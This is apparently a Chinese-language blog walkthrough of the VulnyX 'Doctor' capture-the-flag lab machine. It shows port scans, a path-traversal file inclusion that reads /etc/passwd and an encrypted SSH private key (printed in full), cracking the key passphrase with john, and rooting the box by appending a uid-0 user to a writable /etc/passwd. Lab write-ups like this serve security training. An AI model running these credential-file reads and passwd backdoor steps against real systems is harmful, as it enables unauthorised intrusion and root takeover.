Doctor

靶机说明

一、主机探测

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:28 CST
Nmap scan report for 192.168.2.1
Host is up (0.00062s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00066s latency).
MAC Address: 08:00:27:02:D6:DC (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.44
Host is up (0.00089s latency).
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

IP地址：192.168.2.44

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap --min-rate 10000 -p- 192.168.2.44                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:28 CST
Nmap scan report for 192.168.2.44
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.56 seconds

开放端口：22和80

2、详细信息扫描

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:29 CST
Nmap scan report for 192.168.2.44
Host is up (0.0010s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Docmed
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.99 seconds

3、UDP端口扫描

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# nmap -sU --top-ports 100 192.168.2.44                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-03 14:30 CST
Nmap scan report for 192.168.2.44
Host is up (0.00097s latency).
All 100 scanned ports on 192.168.2.44 are in ignored states.
Not shown: 61 closed udp ports (port-unreach), 39 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F9:ED:72 (Oracle VirtualBox virtual NIC)

没有端口开放

三、WEB渗透

访问80端口，发现该系统模板是Colorlib，同时找到一个域名contact.com

追加域名到hosts文件中

1 2	`┌──(root㉿kali)-[/miao/vulnyx/doctor] └─# echo "192.168.2.44 contact.com" >> /etc/hosts`

1、目录扫描

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# gobuster dir -u http://192.168.2.44 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.44
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 39760]
/.php                 (Status: 403) [Size: 277]
/about.html           (Status: 200) [Size: 31341]
/contact.html         (Status: 200) [Size: 49539]
/blog.html            (Status: 200) [Size: 31455]
/img                  (Status: 301) [Size: 310] [--> http://192.168.2.44/img/]
/main.html            (Status: 200) [Size: 931]
/css                  (Status: 301) [Size: 310] [--> http://192.168.2.44/css/]
/js                   (Status: 301) [Size: 309] [--> http://192.168.2.44/js/]
/elements.html        (Status: 200) [Size: 39421]
/fonts                (Status: 301) [Size: 312] [--> http://192.168.2.44/fonts/]
/Department.html      (Status: 200) [Size: 35900]
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

使用IP和域名进行目录扫描，都没有找到有用的目录

2、文件包含

在访问时，发现doctor页面存在文件包含

尝试读取/etc/passwd，发现可以读取，同时找到一个用户admin

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# curl http://192.168.2.44/doctor-item.php?include=../../../../../etc/passwd                     
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
admin:x:1000:1000:admin:/home/admin:/bin/bash

读取admin的ssh私钥

先读取authorized_keys

1
2
3

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# curl http://192.168.2.44/doctor-item.php?include=../../../../../home/admin/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne

再读取私钥文件id_rsa

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# curl http://192.168.2.44/doctor-item.php?include=../../../../../home/admin/.ssh/id_rsa         
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----

四、SSH私钥密码破解

发现私钥是经过加密的，需要进行破解

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# ssh2john id_rsa > tmp           

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt    
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (id_rsa)     
1g 0:00:00:00 DONE (2025-07-03 15:34) 14.28g/s 18285p/s 18285c/s 18285C/s ramona..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

找到私钥的密码unicorn

五、获取USER权限

直接使用私钥进行连接

┌──(root㉿kali)-[/miao/vulnyx/doctor]
└─# ssh admin@192.168.2.44 -i id_rsa
Enter passphrase for key 'id_rsa': 
admin@doctor:~$ id
uid=1000(admin) gid=1000(admin) grupos=1000(admin)

USER FLAG

1 2	`admin@doctor:~$ cat user.txt`

六、权限提升

使用sudo -l，提示无法使用

1 2	`admin@doctor:~$ sudo -l -bash: sudo: orden no encontrada`

passwd写权限

查看文件权限，发现/etc/passwd具有w权限

1 2	`admin@doctor:/$ ls -la /etc/passwd -rw----rw- 1 root root 1454 jul 3 09:46 /etc/passwd`

写入一个具有root权限的用户

使用openssl生成密码123456的哈希值

admin@doctor:/$ openssl passwd
Password: 
Verifying - Password: 
cxHZ02OJlqOKA

写入/etc/passwd

1	`admin@doctor:/$ echo "miao:cxHZ02OJlqOKA:0:0:root:/root:/bin/bash" >> /etc/passwd`

切换用户，发现具有root权限

admin@doctor:/$ su miao
Contraseña: 
root@doctor:/# id
uid=0(root) gid=0(root) grupos=0(root)

ROOT FLAG

1 2	`root@doctor:~# cat root.txt`

Vulnyx

#文件包含 #提权-passwd

Doctor

http://miao-sec.github.io/Vulnyx/Doctor/

作者

Miao

发布于

2025年7月3日

许可协议

BY-MIAO

Fing 上一篇

New 下一篇